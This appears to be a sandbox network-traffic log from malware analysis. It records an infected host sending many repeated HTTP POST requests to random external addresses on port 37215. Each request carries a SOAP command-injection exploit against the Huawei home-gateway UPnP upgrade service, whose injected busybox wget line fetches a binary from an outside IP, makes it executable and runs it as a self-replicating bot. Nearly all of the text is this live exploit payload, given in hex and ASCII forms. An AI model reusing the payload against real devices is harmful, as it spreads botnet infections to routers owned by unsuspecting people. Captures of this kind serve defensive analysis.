                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1887192.168.2.1339040144.94.250.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650621891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1888192.168.2.1349860200.164.52.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650638103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1889192.168.2.134320441.24.155.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.650970936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1890192.168.2.1352088197.103.221.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.651535988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1891192.168.2.133836041.164.96.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.652090073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1892192.168.2.134778851.226.40.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.652189016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1893192.168.2.1341424185.22.154.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.652192116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1894192.168.2.1333588123.203.93.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.652857065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1895192.168.2.1341684157.246.72.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.652890921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1896192.168.2.1343078157.189.216.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.652961016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
